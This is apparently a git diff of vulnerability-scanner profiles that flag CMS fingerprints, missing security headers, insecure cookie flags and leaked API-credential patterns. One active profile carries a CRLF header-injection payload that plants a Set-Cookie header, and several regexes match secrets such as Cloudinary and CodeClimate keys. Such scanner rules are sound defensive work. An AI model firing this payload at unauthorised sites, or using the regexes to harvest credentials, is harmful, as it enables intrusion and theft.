+ "true,Or,Ticimax",
+ "true,Or,Tiki Wiki CMS",
+ "true,Or,Tilda",
+ "true,Or,Trellix",
+ "true,Or,Tumblr",
+ "true,Or,TypePad",
+ "true,Or,Typecho",
+ "true,Or,Typesetter",
+ "true,Or,Typo3",
+ "true,Or,UBB.threads",
+ "true,Or,UMI.CMS",
+ "true,Or,Ultimize CMS",
+ "true,Or,Umbraco",
+ "true,Or,Vanilla Forums",
+ "true,Or,Vigbo",
+ "true,Or,Vision",
+ "true,Or,Visual Studio",
+ "true,Or,Visualsoft",
+ "true,Or,Vivvo",
+ "true,Or,Volusion",
+ "true,Or,WMaker",
+ "true,Or,WYSIWYG Web Builder",
+ "true,Or,Web 2 Date",
+ "true,Or,WebAcappella",
+ "true,Or,Web Commander",
+ "true,Or,WebGUI",
+ "true,Or,Web Page Maker",
+ "true,Or,WebPlus",
+ "true,Or,Web Presence Builder",
+ "true,Or,Web Shop Manager",
+ "true,Or,WebSite Tonight",
+ "true,Or,WebSphere Studio Homepage Builder",
+ "true,Or,Webflow",
+ "true,Or,Weblication",
+ "true,Or,Webs",
+ "true,Or,Websale",
+ "true,Or,WebsiteBuilder",
+ "true,Or,WebSite X5",
+ "true,Or,Websplanet",
+ "true,Or,Webvision",
+ "true,Or,Weebly",
+ "true,Or,Wheel CMS",
+ "true,Or,Wikispaces",
+ "true,Or,Wix",
+ "true,Or,WiziShop",
+ "true,Or,WoltLab",
+ "true,Or,XT-Commerce",
+ "true,Or,Xara",
+ "true,Or,XenForo",
+ "true,Or,Xiuno BBS",
+ "true,Or,Xoops",
+ "true,Or,XpressEngine",
+ "true,Or,X‑Cart",
+ "true,Or,YaBB",
+ "true,Or,Yahoo Small Business",
+ "true,Or,Yellow Pages Canada",
+ "true,Or,Yola",
+ "true,Or,ZMS",
+ "true,Or,Zen Cart",
+ "true,Or,Zendesk",
+ "true,Or,Zoho Sites",
+ "true,Or,Zyro",
+ "true,Or,b2evolution",
+ "true,Or,blog.ir",
+ "true,Or,cloudrexx",
+ "true,Or,concrete5",
+ "true,Or,docsify",
+ "true,Or,dotCMS",
+ "true,Or,e107",
+ "true,Or,ePages",
+ "true,Or,eSyndiCat",
+ "true,Or,eZ Publish",
+ "true,Or,elcomCMS",
+ "true,Or,fCMS",
+ "true,Or,iWeb",
+ "true,Or,kimsq",
+ "true,Or,nopCommerce",
+ "true,Or,onpublix CMS",
+ "true,Or,1C-Bitrix",
+ "true,Or,pTools",
+ "true,Or,phpwcms",
+ "true,Or,phpwind",
+ "true,Or,plentymarkets",
+ "true,Or,uCoz"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "CMS Detected",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "CMS Detected",
+ "RemediationDetail": "CMS Detected",
+ "IssueBackground": "CMS Detected",
+ "RemediationBackground": "CMS Detected",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/CRLF-Attack.bb b/profiles/CRLF-Attack.bb
index 7abff5a..c792bc9 100755
--- a/profiles/CRLF-Attack.bb
+++ b/profiles/CRLF-Attack.bb
@@ -1 +1,97 @@
-[{"Name":"CRLF-Attack","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["%0D%0ASet-Cookie:%20mycookie\u003dmyvalue"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or, ^Set-Cookie:\\smycookie\u003dmyvalue"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":3,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"CRLF-Attack","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "CRLF-Attack",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,%0D%0ASet-Cookie:%20mycookie\u003dmyvalue"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,, ^Set-Cookie:\\smycookie\u003dmyvalue"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 3,
+ "MaxRedir": 3,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "CRLF-Attack",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Cache-Control.bb b/profiles/Cache-Control.bb
new file mode 100755
index 0000000..f4d8404
--- /dev/null
+++ b/profiles/Cache-Control.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "Cache-Control",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,Cache-Control: no-store"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": true,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Cache-Control",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Security Header \"Cache-Control\" not present in response.",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Cisco_ASA_Device_Found.bb b/profiles/Cisco_ASA_Device_Found.bb
index 425e011..0123621 100755
--- a/profiles/Cisco_ASA_Device_Found.bb
+++ b/profiles/Cisco_ASA_Device_Found.bb
@@ -1 +1,60 @@
-[{"Name":"Cisco_ASA_Device_Found","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,+CSCOE+","true,Or,+CSCOT+"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Cisco ASA Device Found (Passive)","IssueSeverity":"Low","IssueConfidence":"Certain","IssueDetail":"Cisco ASA Device Found (Passive)","RemediationDetail":"Cisco ASA Device Found (Passive)","IssueBackground":"Cisco ASA Device Found (Passive)","RemediationBackground":"Cisco ASA Device Found (Passive)","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Cisco_ASA_Device_Found",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,+CSCOE+",
+ "true,Or,+CSCOT+"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Cisco ASA Device Found (Passive)",
+ "IssueSeverity": "Low",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Cisco ASA Device Found (Passive)",
+ "RemediationDetail": "Cisco ASA Device Found (Passive)",
+ "IssueBackground": "Cisco ASA Device Found (Passive)",
+ "RemediationBackground": "Cisco ASA Device Found (Passive)",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Cloudinary_Basic_Auth.bb b/profiles/Cloudinary_Basic_Auth.bb
old mode 100644
new mode 100755
index 8b7a721..9691464
--- a/profiles/Cloudinary_Basic_Auth.bb
+++ b/profiles/Cloudinary_Basic_Auth.bb
@@ -1 +1,59 @@
-[{"Name":"Cloudinary_Basic_Auth","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,cloudinary:\\/\\/[0-9]{15}:[0-9A-Za-z]+@[a-z]+"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Cloudinary Basic Auth","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Cloudinary_Basic_Auth",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,cloudinary:\\/\\/[0-9]{15}:[0-9A-Za-z]+@[a-z]+"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Cloudinary Basic Auth",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/CodeClimate_Key.bb b/profiles/CodeClimate_Key.bb
old mode 100644
new mode 100755
index 95a138a..b57afea
--- a/profiles/CodeClimate_Key.bb
+++ b/profiles/CodeClimate_Key.bb
@@ -1 +1,59 @@
-[{"Name":"CodeClimate_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)codeclima.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{64}(\\\\\\\"|\u0027|`)?"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"CodeClimate Key","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "CodeClimate_Key",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?i)codeclima.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{64}(\\\\\\\"|\u0027|`)?"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "CodeClimate Key",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Content-Security-Policy.bb b/profiles/Content-Security-Policy.bb
new file mode 100755
index 0000000..3992642
--- /dev/null
+++ b/profiles/Content-Security-Policy.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "Content-Security-Policy",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,Content-Security-Policy"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": true,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 1,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Content-Security-Policy",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Security Header \"Content-Security-Policy\" not present in response.",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/CookieAttrubute-HttpOnly.bb b/profiles/CookieAttrubute-HttpOnly.bb
new file mode 100755
index 0000000..969486c
--- /dev/null
+++ b/profiles/CookieAttrubute-HttpOnly.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "CookieAttrubute-HttpOnly",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,set-cookie:\\s*(?!.*(httponly)).*"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "CookieAttrubute-HttpOnly",
+ "IssueSeverity": "Low",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Cookie attribute \"HttpOnly\" not present: \u003cbr\u003e \u003cgrep\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/CookieAttrubute-SameSite.bb b/profiles/CookieAttrubute-SameSite.bb
new file mode 100755
index 0000000..2a2cae5
--- /dev/null
+++ b/profiles/CookieAttrubute-SameSite.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "CookieAttrubute-SameSite",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,set-cookie:\\s*(?!.*(samesite)).*"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "CookieAttrubute-SameSite",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Cookie attribute \"Samesite\" not present: \u003cbr\u003e \u003cgrep\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/CookieAttrubute-Secure.bb b/profiles/CookieAttrubute-Secure.bb
new file mode 100755
index 0000000..7448396
--- /dev/null
+++ b/profiles/CookieAttrubute-Secure.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "CookieAttrubute-Secure",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,set-cookie:\\s*(?!.*(secure)).*"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "CookieAttrubute-Secure",
+ "IssueSeverity": "Low",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Cookie attribute \"secure\" not present: \u003cbr\u003e\u003cgrep\u003e\n\n",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Cookie_Security.bb b/profiles/Cookie_Security.bb
deleted file mode 100644
index c7597d7..0000000
--- a/profiles/Cookie_Security.bb
+++ /dev/null
@@ -1 +0,0 @@
-[{"Name":"Cookie_Security","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,set-cookie:\\s*(?!.*(httponly)).*","true,Or,set-cookie:\\s*(?!.*(samesite)).*","true,Or,set-cookie:\\s*(?!.*(secure)).*"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Cookie Security flags","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Missing Security Flags (HTTPOnly,Secure or SameSite)","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/DefaultRDP.bb b/profiles/DefaultRDP.bb
new file mode 100755
index 0000000..fc9d984
--- /dev/null
+++ b/profiles/DefaultRDP.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "DefaultRDP",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,default.rdp"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "DefaultRDP",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Default RDP Found:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/5023/",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/DigitalOcean_Space_Discovered.bb b/profiles/DigitalOcean_Space_Discovered.bb
old mode 100644
new mode 100755
index 91d7877..c67741a
--- a/profiles/DigitalOcean_Space_Discovered.bb
+++ b/profiles/DigitalOcean_Space_Discovered.bb
@@ -1 +1,59 @@
-[{"Name":"DigitalOcean_Space_Discovered","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,http(?:s)://[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.digitaloceanspaces.com"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"DigitalOcean Space Discovered","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
